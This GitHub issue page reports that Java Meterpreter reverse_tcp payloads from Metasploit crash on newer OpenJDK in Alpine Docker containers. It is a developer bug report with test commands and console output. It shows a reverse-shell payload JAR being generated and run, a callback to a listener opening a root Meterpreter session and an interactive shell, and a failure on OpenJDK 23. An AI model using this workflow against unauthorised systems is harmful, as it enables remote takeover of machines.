Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Java Meterpreter payloads failing with OpenJDK on Alpine Linux #702

Closed
cdelafuente-r7 opened this issue May 14, 2024 · 0 comments · Fixed by #703
Closed

Java Meterpreter payloads failing with OpenJDK on Alpine Linux #702

cdelafuente-r7 opened this issue May 14, 2024 · 0 comments · Fixed by #703
Assignees
@cdelafuente-r7
Labels
bug java

Comments

@cdelafuente-r7
Copy link
Contributor

Alpine Linux is commonly used with Docker container and the default Java platform is usually OpenJDK. Meterpreter crashes with newer versions of OpenJDK.

Generating a payload

msf6 > use payload/java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 192.168.144.1
lhost => 192.168.144.1
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 payload(java/meterpreter/reverse_tcp) > generate -f jar -o /home/msfuser/test/payload.jar
[*] Writing 5263 bytes to /home/msfuser/test/payload.jar...

Meterpreter with OpenJDK version 11

Docker container (Alpine Linux)

❯ docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp -ti openjdk:11 bash
root@6ddeee749c29:/usr/src/myapp# java -jar payload.jar

Metasploit output

msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (57971 bytes) to 192.168.144.1
[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.1:56244) at 2024-05-14 18:09:10 +0200

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : 90477660aa40
OS              : Linux 6.6.22-linuxkit (amd64)
Architecture    : x64
System Language : en
Meterpreter     : java/linux
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 1 created.
Channel 1 created.
root@90477660aa40:/usr/src/myapp# java --version
java --version
openjdk 11.0.16 2022-07-19
OpenJDK Runtime Environment 18.9 (build 11.0.16+8)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.16+8, mixed mode, sharing)

Meterpreter with OpenJDK version 23

Docker container (Alpine Linux)

❯ docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp -ti openjdk:23 bash
bash-5.1# java -jar payload.jar

Metasploit output

msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (57971 bytes) to 192.168.144.1
[*] 192.168.144.1 - Meterpreter session 2 closed.  Reason: Died
msf6 payload(java/meterpreter/reverse_tcp) > [-] Meterpreter session 2 is not valid and will be closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
bug java
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
1 participant
@cdelafuente-r7